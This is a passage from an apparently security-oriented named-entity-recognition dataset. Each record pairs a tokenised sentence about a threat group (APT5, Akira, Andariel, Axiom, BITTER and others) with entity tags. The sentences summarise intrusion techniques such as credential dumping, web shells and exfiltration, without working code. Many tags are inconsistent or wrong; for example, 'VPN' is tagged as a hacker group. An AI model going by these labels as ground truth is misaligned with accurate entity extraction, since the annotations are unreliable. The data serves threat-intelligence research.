"BLOODMINE", "utility", "to", "discover", "files", "with", ".css,", ".jpg,", ".png,", ".gif,", ".ico,", ".js,", "and", ".jsp", "extensions", "in", "Pulse", "Secure", "Connect", "logs." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-Way", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT5", "has", "used", "the", "CLEANPULSE", "utility", "to", "insert", "command", "line", "strings", "into", "a", "targeted", "process", "to", "prevent", "certain", "log", "events", "from", "occurring." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT5", "has", "used", "the", "THINBLOOD", "utility", "to", "clear", "SSL", "VPN", "log", "files", "located", "at", "`/home/runtime/logs`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "I-Features", "B-Purp", "B-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT5", "has", "used", "malware", "with", "keylogging", "capabilities", "to", "monitor", "the", "communications", "of", "targeted", "entities." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "APT5", "has", "used", "the", "Task", "Manager", "process", "to", "target", "LSASS", "process", "memory", "in", "order", "to", "obtain", "NTLM", "password", "hashes.", "APT5", "has", "also", "dumped", "clear", "text", "passwords", "and", "hashes", "from", "memory", "using", "Mimikatz", "hosted", "through", "an", "RDP", "mapped", "drive." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "APT5", "has", "created", "Local", "Administrator", "accounts", "to", "maintain", "access", "to", "systems", "with", "short-cycle", "credential", "rotation." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT5", "has", "staged", "data", "on", "compromised", "systems", "prior", "to", "exfiltration", "often", "in", "`C:\\Users\\Public`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT5", "has", "used", "the", "BLOODMINE", "utility", "to", "parse", "and", "extract", "information", "from", "Pulse", "Secure", "Connect", "logs." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT5", "has", "named", "exfiltration", "archives", "to", "mimic", "Windows", "Updates", "at", "times", "using", "filenames", "with", "a", "`KB<digits>.zip`", "pattern." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT5", "has", "used", "PowerShell", "to", "accomplish", "tasks", "within", "targeted", "environments." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT5", "has", "used", "Windows-based", "utilities", "to", "carry", "out", "tasks", "including", "tasklist.exe." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "APT5", "has", "used", "the", "CLEANPULSE", "utility", "to", "insert", "command", "line", "strings", "into", "a", "targeted", "process", "to", "alter", "its", "functionality." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT5", "has", "moved", "laterally", "throughout", "victim", "environments", "using", "RDP." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "APT5", "has", "used", "SSH", "for", "lateral", "movement", "in", "compromised", "environments", "including", "for", "enabling", "access", "to", "ESXi", "host", "servers." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT5", "has", "copied", "and", "exfiltrated", "the", "SAM", "Registry", "hive", "from", "targeted", "systems." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT5", "has", "used", "the", "BLOODMINE", "utility", "to", "collect", "data", "on", "web", "requests", "from", "Pulse", "Secure", "Connect", "logs." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT5", "has", "modified", "file", "timestamps." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O" ] }, { "tokens": [ "APT5", "has", "installed", "multiple", "web", "shells", "on", "compromised", "servers", "including", "on", "Pulse", "Secure", "VPN", "appliances." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "APT5", "has", "used", "cmd.exe", "for", "execution", "on", "compromised", "systems." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ajax", "Security", "Team", "has", "used", "FireMalv", "custom-developed", "malware,", "which", "collected", "passwords", "from", "the", "Firefox", "browser", "storage." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ajax", "Security", "Team", "has", "used", "Wrapper/Gholee,", "custom-developed", "malware,", "which", "downloaded", "additional", "malware", "to", "the", "infected", "system." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "B-Purp", "B-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Ajax", "Security", "Team", "has", "used", "CWoolger", "and", "MPK,", "custom-developed", "malware,", "which", "recorded", "all", "keystrokes", "on", "an", "infected", "system." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ajax", "Security", "Team", "has", "lured", "victims", "into", "executing", "malicious", "files." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Ajax", "Security", "Team", "has", "used", "personalized", "spearphishing", "attachments." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "I-HackOrg", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Ajax", "Security", "Team", "has", "used", "various", "social", "media", "channels", "to", "spearphish", "victims." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "I-HackOrg", "O", "O", "O", "I-Idus", "I-Idus", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Akira", "deletes", "administrator", "accounts", "in", "victim", "networks", "prior", "to", "encryption." ], "ner_tags": [ "B-HackOrg", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Akira", "uses", "utilities", "such", "as", "WinRAR", "to", "archive", "data", "prior", "to", "exfiltration." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "B-Way", "O", "O", "B-Purp", "O", "O", "O" ] }, { "tokens": [ "Akira", "encrypts", "files", "in", "victim", "environments", "as", "part", "of", "ransomware", "operations." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Akira", "uses", "the", "built-in", "Nltest", "utility", "or", "tools", "such", "as", "AdFind", "to", "enumerate", "Active", "Directory", "trusts", "in", "victim", "environments." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Akira", "will", "exfiltrate", "victim", "data", "using", "applications", "such", "as", "Rclone." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Akira", "uses", "compromised", "VPN", "accounts", "for", "initial", "access", "to", "victim", "networks." ], "ner_tags": [ "B-HackOrg", "O", "B-Tool", "B-Features", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Akira", "engages", "in", "double-extortion", "ransomware,", "exfiltrating", "files", "then", "encrypting", "them,", "in", "order", "to", "prompt", "victims", "to", "pay", "a", "ransom." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-SamFile", "B-Way", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Akira", "uses", "legitimate", "utilities", "such", "as", "AnyDesk", "and", "PuTTy", "for", "maintaining", "remote", "access", "to", "victim", "environments." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "Akira", "uses", "software", "such", "as", "Advanced", "IP", "Scanner", "and", "MASSCAN", "to", "identify", "remote", "hosts", "within", "victim", "networks." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Akira", "has", "accessed", "and", "downloaded", "information", "stored", "in", "SharePoint", "instances", "as", "part", "of", "data", "gathering", "and", "exfiltration", "activity." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "B-Org", "B-OffAct" ] }, { "tokens": [ "Akira", "uses", "valid", "account", "information", "to", "remotely", "access", "victim", "networks,", "such", "as", "VPN", "credentials." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Andariel", "has", "collected", "large", "numbers", "of", "files", "from", "compromised", "network", "systems", "for", "later", "extraction." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Andariel", "has", "used", "watering", "hole", "attacks,", "often", "with", "zero-day", "exploits,", "to", "gain", "initial", "access", "to", "victims", "within", "a", "specific", "IP", "range." ], "ner_tags": [ "B-Idus", "O", "O", "B-Org", "I-OffAct", "O", "O", "O", "B-Features", "B-Exp", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Andariel", "has", "exploited", "numerous", "ActiveX", "vulnerabilities,", "including", "zero-days." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Features", "B-Exp", "O", "B-Features" ] }, { "tokens": [ "Andariel", "has", "limited", "its", "watering", "hole", "attacks", "to", "specific", "IP", "address", "ranges." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Org", "I-OffAct", "I-OffAct", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Andariel", "has", "downloaded", "additional", "tools", "and", "malware", "onto", "compromised", "hosts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Andariel", "has", "attempted", "to", "lure", "victims", "into", "enabling", "malicious", "macros", "within", "email", "attachments." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Way", "O" ] }, { "tokens": [ "Andariel", "has", "used", "a", "variety", "of", "publicly-available", "remote", "access", "Trojans", "(RATs)", "for", "its", "operations." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Andariel", "has", "used", "<code>tasklist</code>", "to", "enumerate", "processes", "and", "find", "a", "specific", "string." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Andariel", "has", "inserted", "a", "malicious", "script", "within", "compromised", "websites", "to", "collect", "potential", "victim", "information", "such", "as", "browser", "type,", "system", "language,", "Flash", "Player", "version,", "and", "other", "data." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Andariel", "has", "conducted", "spearphishing", "campaigns", "that", "included", "malicious", "Word", "or", "Excel", "attachments." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O" ] }, { "tokens": [ "Andariel", "has", "hidden", "malicious", "executables", "within", "PNG", "files." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Tool", "O" ] }, { "tokens": [ "Andariel", "has", "used", "the", "<code>netstat", "-naop", "tcp</code>", "command", "to", "display", "TCP", "connections", "on", "a", "victim's", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Aoqin", "Dragon", "has", "exploited", "CVE-2012-0158", "and", "CVE-2010-3333", "for", "execution", "against", "targeted", "systems." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Aoqin", "Dragon", "has", "run", "scripts", "to", "identify", "file", "formats", "including", "Microsoft", "Word." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "I-SamFile", "O" ] }, { "tokens": [ "Aoqin", "Dragon", "has", "spread", "malware", "in", "target", "networks", "by", "copying", "modules", "to", "folders", "masquerading", "as", "removable", "devices." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Purp", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Aoqin", "Dragon", "has", "lured", "victims", "into", "opening", "weaponized", "documents,", "fake", "external", "drives,", "and", "fake", "antivirus", "to", "execute", "malicious", "payloads." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "O", "O", "I-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Aoqin", "Dragon", "has", "used", "custom", "malware,", "including", "Mongall", "and", "Heyoka", "Backdoor,", "in", "their", "operations." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "Aoqin", "Dragon", "has", "used", "fake", "icons", "including", "antivirus", "and", "external", "drives", "to", "disguise", "malicious", "payloads." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Aoqin", "Dragon", "has", "used", "a", "dropper", "that", "employs", "a", "worm", "infection", "strategy", "using", "a", "removable", "device", "to", "breach", "a", "secure", "network", "environment." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "B-Way", "O", "O", "O", "I-Way", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Aoqin", "Dragon", "has", "used", "the", "Themida", "packer", "to", "obfuscate", "malicious", "payloads." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Aoqin", "Dragon", "obtained", "the", "Heyoka", "open", "source", "exfiltration", "tool", "and", "subsequently", "modified", "it", "for", "their", "operations." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Aquatic", "Panda", "has", "used", "WinRAR", "to", "compress", "memory", "dumps", "prior", "to", "exfiltration." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Aquatic", "Panda", "has", "encoded", "PowerShell", "commands", "in", "Base64." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "B-Tool", "O", "O" ] }, { "tokens": [ "Aquatic", "Panda", "has", "used", "DLL", "search-order", "hijacking", "to", "load", "`exe`,", "`dll`,", "and", "`dat`", "files", "into", "memory." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Aquatic", "Panda", "has", "attempted", "to", "stop", "endpoint", "detection", "and", "response", "(EDR)", "tools", "on", "compromised", "systems." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Aquatic", "Panda", "has", "deleted", "malicious", "executables", "from", "compromised", "machines." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "I-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Aquatic", "Panda", "has", "downloaded", "additional", "malware", "onto", "compromised", "hosts." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "B-OffAct", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Aquatic", "Panda", "has", "attempted", "to", "harvest", "credentials", "through", "LSASS", "memory", "dumping." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Aquatic", "Panda", "has", "acquired", "and", "used", "njRAT", "in", "its", "operations." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Aquatic", "Panda", "has", "downloaded", "additional", "scripts", "and", "executed", "Base64", "encoded", "commands", "in", "PowerShell." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "I-OffAct", "I-OffAct", "I-OffAct", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Aquatic", "Panda", "has", "attempted", "to", "discover", "third", "party", "endpoint", "detection", "and", "response", "(EDR)", "tools", "on", "compromised", "systems." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Aquatic", "Panda", "has", "used", "native", "OS", "commands", "to", "understand", "privilege", "levels", "and", "system", "details." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Aquatic", "Panda", "has", "attempted", "to", "discover", "services", "for", "third", "party", "EDR", "products." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Aquatic", "Panda", "has", "acquired", "and", "used", "Cobalt", "Strike", "in", "its", "operations." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "Aquatic", "Panda", "has", "used", "publicly", "accessible", "DNS", "logging", "services", "to", "identify", "servers", "vulnerable", "to", "Log4j", "(CVE", "2021-44228)." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Aquatic", "Panda", "has", "attempted", "and", "failed", "to", "run", "Bash", "commands", "on", "a", "Windows", "host", "by", "passing", "them", "to", "<code>cmd", "/C</code>." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Axiom", "actors", "have", "been", "known", "to", "use", "the", "Sticky", "Keys", "replacement", "within", "RDP", "sessions", "to", "obtain", "persistence." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Axiom", "has", "compressed", "and", "encrypted", "data", "prior", "to", "exfiltration." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Axiom", "has", "used", "large", "groups", "of", "compromised", "machines", "for", "use", "as", "proxy", "nodes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Axiom", "has", "acquired", "dynamic", "DNS", "services", "for", "use", "in", "the", "targeting", "of", "intended", "victims." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Axiom", "has", "collected", "data", "from", "a", "compromised", "network." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Axiom", "has", "used", "watering", "hole", "attacks", "to", "gain", "access." ], "ner_tags": [ "B-Idus", "O", "O", "B-Org", "I-OffAct", "I-OffAct", "O", "O", "O" ] }, { "tokens": [ "Axiom", "has", "been", "observed", "using", "SQL", "injection", "to", "gain", "access", "to", "systems." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Tool", "I-Way", "O", "I-Purp", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "Axiom", "has", "used", "exploits", "for", "multiple", "vulnerabilities", "including", "CVE-2014-0322,", "CVE-2012-4792,", "CVE-2012-1889,", "and", "CVE-2013-3893." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Features", "B-Features", "B-Features", "O", "B-Features" ] }, { "tokens": [ "Axiom", "has", "been", "known", "to", "dump", "credentials." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Axiom", "has", "used", "spear", "phishing", "to", "initially", "compromise", "victims." ], "ner_tags": [ "B-Idus", "O", "O", "I-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Axiom", "has", "targeted", "victims", "with", "remote", "administration", "tools", "including", "RDP." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Axiom", "has", "used", "RDP", "during", "operations." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Axiom", "has", "used", "steganography", "to", "hide", "its", "C2", "communications." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Axiom", "has", "used", "digital", "certificates", "to", "deliver", "malware." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "Axiom", "has", "used", "previously", "compromised", "administrative", "accounts", "to", "escalate", "privileges." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Axiom", "has", "used", "VPS", "hosting", "providers", "in", "targeting", "of", "intended", "victims." ], "ner_tags": [ "B-Idus", "O", "O", "B-Idus", "I-Org", "I-Org", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BITTER", "has", "registered", "a", "variety", "of", "domains", "to", "host", "malicious", "payloads", "and", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BITTER", "has", "executed", "OLE", "objects", "using", "Microsoft", "Equation", "Editor", "to", "download", "and", "run", "malicious", "payloads." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BITTER", "has", "used", "DDNS", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "BITTER", "has", "encrypted", "their", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BITTER", "has", "used", "a", "RAR", "SFX", "dropper", "to", "deliver", "malware." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "BITTER", "has", "exploited", "Microsoft", "Office", "vulnerabilities", "CVE-2012-0158,", "CVE-2017-11882,", "CVE-2018-0798,", "and", "CVE-2018-0802." ], "ner_tags": [ "B-Idus", "O", "O", "I-Exp", "I-Exp", "I-Exp", "B-Features", "B-Features", "B-Features", "O", "B-Features" ] }, { "tokens": [ "BITTER", "has", "exploited", "CVE-2021-1732", "for", "privilege", "escalation." ], "ner_tags": [ "B-Idus", "O", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "BITTER", "has", "downloaded", "additional", "malware", "and", "tools", "onto", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "I-OffAct", "I-OffAct", "B-OffAct", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BITTER", "has", "attempted", "to", "lure", "victims", "into", "opening", "malicious", "attachments", "delivered", "via", "spearphishing." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-SecTeam", "O", "O", "B-Way" ] }, { "tokens": [ "BITTER", "has", "disguised", "malware", "as", "a", "Windows", "Security", "update", "service." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BITTER", "has", "used", "TCP", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "BITTER", "has", "used", "scheduled", "tasks", "for", "persistence", "and", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BITTER", "has", "sent", "spearphishing", "emails", "with", "a", "malicious", "RTF", "document", "or", "Excel", "spreadsheet." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Way", "O", "O", "O", "B-SamFile", "O", "O", "B-Way", "O" ] }, { "tokens": [ "BITTER", "has", "obtained", "tools", "such", "as", "PuTTY", "for", "use", "in", "their", "operations." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BITTER", "has", "registered", "domains", "to", "stage", "payloads." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BITTER", "has", "used", "HTTP", "POST", "requests", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BRONZE", "BUTLER", "has", "compressed", "data", "into", "password-protected", "RAR", "archives", "prior", "to", "exfiltration." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BRONZE", "BUTLER", "has", "used", "at", "to", "register", "a", "scheduled", "task", "to", "execute", "malware", "during", "lateral", "movement." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BRONZE", "BUTLER", "downloader", "code", "has", "included", "\"0\"", "characters", "at", "the", "end", "of", "the", "file", "to", "inflate", "the", "file", "size", "in", "a", "likely", "attempt", "to", "evade", "anti-virus", "detection." ], "ner_tags": [ "B-Idus", "B-HackOrg", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BRONZE", "BUTLER", "has", "used", "a", "Windows", "10", "specific", "tool", "and", "xxmm", "to", "bypass", "UAC", "for", "privilege", "escalation." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "B-Purp" ] }, { "tokens": [ "BRONZE", "BUTLER", "has", "used", "legitimate", "applications", "to", "side-load", "malicious", "DLLs." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "BRONZE", "BUTLER", "has", "exfiltrated", "files", "stolen", "from", "local", "systems." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BRONZE", "BUTLER", "has", "exfiltrated", "files", "stolen", "from", "file", "shares." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BRONZE", "BUTLER's", "MSGET", "downloader", "uses", "a", "dead", "drop", "resolver", "to", "access", "malicious", "payloads." ], "ner_tags": [ "B-Idus", "B-HackOrg", "B-Way", "B-Tool", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BRONZE", "BUTLER", "downloads", "encoded", "payloads", "and", "decodes", "them", "on", "the", "victim." ], "ner_tags": [ "B-Idus", "B-HackOrg", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BRONZE", "BUTLER", "has", "incorporated", "code", "into", "several", "tools", "that", "attempts", "to", "terminate", "anti-virus", "processes." ], "ner_tags": [ "B-Idus", 